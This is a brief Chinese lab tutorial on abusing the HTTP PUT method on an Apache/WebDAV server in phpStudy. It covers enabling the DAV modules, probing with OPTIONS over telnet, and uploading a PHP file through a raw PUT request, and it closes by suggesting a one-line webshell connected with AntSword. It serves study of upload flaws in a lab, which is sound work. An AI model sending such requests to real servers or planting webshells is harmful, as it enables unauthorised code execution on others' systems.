实验环境
Window server 2008 +phpstudy
文章目录
第一章 文件上传的条件
Web 服务器要开启文件上传功能,并且上传api(接口)对外“开放”(Web 用户可以访问);
Web 用户对目标目录具有可写权限,甚至具有执行权限,一般情况下,Web 目录都有执行权限。
要想完美利用文件上传漏洞,就是上传的文件可以执行,也就是Web 容器可以解析我们上传的脚本,无论脚本以什么样的形式存在。
无视以上条件的情况就是服务器配置不当,开启了PUT 方法。
第二章window server2008开启telnet
【https://blog.csdn.net/qq_41901122/article/details/102159506】
window2008开启telnet服务
第三章 Apache 开启PUT 方法
第一节 测试Apache 是否开启了put 方法
telnet 192.168.139.136 80
----
OPTIONS / HTTP/1.1
HOST:172.16.132.161
----
第二节 apache 开启put 方法操作
第一步 开启Dav
1.开启模块
路径[C:\phpStudy\Apache\conf]
----
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
----
第二步 启用模块
第三步.开启文件锁
----
DavLockDB c:\phpstudy\www\DavLock
----
第四章文件上传案例
Telnet 192.168.139.136 80
扫描二维码关注公众号,回复:
9950628 查看本文章
----
PUT /infoa.php HTTP/1.1
HOST: 192.168.139.136
Content-Length: 18
<?php phpinfo();?>
----
尝试上传一句话木马–蚁剑链接
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!